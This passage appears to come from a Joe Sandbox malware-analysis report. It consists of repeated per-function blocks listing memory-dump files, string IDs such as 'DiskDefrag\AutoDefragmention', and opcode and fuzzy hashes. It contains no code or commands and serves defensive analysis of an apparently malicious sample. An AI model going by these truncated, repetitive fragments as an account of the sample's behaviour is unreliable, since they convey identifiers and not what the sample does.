                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: IconicRectWindow
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 3467660236-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 6369986c62335c2f169f127993e99def2b7867e344ea96c29496c685a54ad688
                                                                                                                                                                                                                                                                                                • Instruction ID: f9d6239d05f36fe70fa0ff212e7df7f15f460ae1a1a005da7839878c6ec85a4b
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6369986c62335c2f169f127993e99def2b7867e344ea96c29496c685a54ad688
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 58E012723002348BD7319B65A444B9736E87B04788F8445EFA045C71B2D768E884C65C
                                                                                                                                                                                                                                                                                                Function 0044E95A Relevance: 1.5, Strings: 1, Instructions: 246COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: DiskDefrag\AutoDefragmention
                                                                                                                                                                                                                                                                                                • API String ID: 0-3564132280
                                                                                                                                                                                                                                                                                                • Opcode ID: dc3eb1a8291cfcc44befdd0b81a2d3cc0d6bc2a24e272f937c8f8eb1dffa6e4f
                                                                                                                                                                                                                                                                                                • Instruction ID: e958d21163334a27c47b0fc85bbaacef7bda82fad0e0f943e856080444f81741
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dc3eb1a8291cfcc44befdd0b81a2d3cc0d6bc2a24e272f937c8f8eb1dffa6e4f
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9691AEB1D045689AEB208B16CC847FAB775FF84310F1081FAD44DA7684EB785EC2CB5A
                                                                                                                                                                                                                                                                                                Function 00434DB0 Relevance: 1.5, Strings: 1, Instructions: 237COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: ZS
                                                                                                                                                                                                                                                                                                • API String ID: 0-2462379649
                                                                                                                                                                                                                                                                                                • Opcode ID: c9fca04b9b31143a71d11b10c0a7b839e3dd0717628822feacdf38de00b63aa6
                                                                                                                                                                                                                                                                                                • Instruction ID: f21c68479b3c5eaebc1f5f3279f8d0faad101d72c6b89a0a1b7083a0ace80ae7
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c9fca04b9b31143a71d11b10c0a7b839e3dd0717628822feacdf38de00b63aa6
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C49104B2D055549BE728CB28CD89AEEBBB5EB89300F1481FFD40D67294D6785BC2CE41
                                                                                                                                                                                                                                                                                                Function 004406A2 Relevance: 1.5, Strings: 1, Instructions: 231COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: LIIM
                                                                                                                                                                                                                                                                                                • API String ID: 0-2786805687
                                                                                                                                                                                                                                                                                                • Opcode ID: 0d070309e750cc16137fbcd4093448cd008a69c095d032d88c4fcb2cb504cc60
                                                                                                                                                                                                                                                                                                • Instruction ID: b690eebd353d2b85d82ae278129cacf35f28f669fdaef5e0157aee0fe20bd044
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0d070309e750cc16137fbcd4093448cd008a69c095d032d88c4fcb2cb504cc60
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2391FFB5D146288AEB248B25DC847EB7735FF94310F1081FAE90DA7680E6795EC1CF26
                                                                                                                                                                                                                                                                                                Function 00434B56 Relevance: 1.4, Strings: 1, Instructions: 197COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: M2PN
                                                                                                                                                                                                                                                                                                • API String ID: 0-1141530561
                                                                                                                                                                                                                                                                                                • Opcode ID: 163e1b2de707743fd5abd76dcefe4b986878c171430d14b46aaf6ac205012e71
                                                                                                                                                                                                                                                                                                • Instruction ID: b45ff77288e52d8fceb6442b72d5a5c11cff704adc7a61e63b92c1ca90ae0501
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 163e1b2de707743fd5abd76dcefe4b986878c171430d14b46aaf6ac205012e71
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A77138B3D116145AF76CCA25DC9AAEBBB78EB85304F1081BBE40E56580DA7C5BC1CE42
                                                                                                                                                                                                                                                                                                Function 00434B30 Relevance: 1.4, Strings: 1, Instructions: 155COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: M2PN
                                                                                                                                                                                                                                                                                                • API String ID: 0-1141530561
                                                                                                                                                                                                                                                                                                • Opcode ID: bce53acc8339f026b01eb678d4e04c81f62b6b16d0eeaff7d47bfef90031c058
                                                                                                                                                                                                                                                                                                • Instruction ID: 8b48fcab1f62f79797c961b25b48a75d2e1cd7c856f0701d3c915d2211f122b7
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bce53acc8339f026b01eb678d4e04c81f62b6b16d0eeaff7d47bfef90031c058
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0F5116F3D012145AF75CCA14ED9AAEBBB78EB81314F1181BFE40EA5580DA7C5BC18E42
                                                                                                                                                                                                                                                                                                Function 0043557E Relevance: 1.4, Strings: 1, Instructions: 142COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: ZS
                                                                                                                                                                                                                                                                                                • API String ID: 0-2462379649
                                                                                                                                                                                                                                                                                                • Opcode ID: f83dbaa3103210abbac085dce078393b74cbf9aa4bc9ad77f02cb7f14c9a23f5
                                                                                                                                                                                                                                                                                                • Instruction ID: 79fb0355c5ed6b7355140cc2999def6dac6f408cb27f933924ab1563575a7ad0
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f83dbaa3103210abbac085dce078393b74cbf9aa4bc9ad77f02cb7f14c9a23f5
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6B5158F2D046545FE728CF28CD89AEEBB75EB99300F0481BFD40967694D6345B82CE01
                                                                                                                                                                                                                                                                                                Function 0044B583 Relevance: .3, Instructions: 325COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: cebec52c35d6d5a577127b37ee6518f550ca64958a00bab29b82289b9b11b50d
                                                                                                                                                                                                                                                                                                • Instruction ID: 6ff4827c734279f7e0de841156aecca73684415df30a65aab8c3daa831c00a85
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cebec52c35d6d5a577127b37ee6518f550ca64958a00bab29b82289b9b11b50d
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 20D1F8B2D082689AF7248A24DC44BEA7A75EB51310F0480FED44D57381DB7D5FC58FA6
                                                                                                                                                                                                                                                                                                Function 0044B630 Relevance: .3, Instructions: 280COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
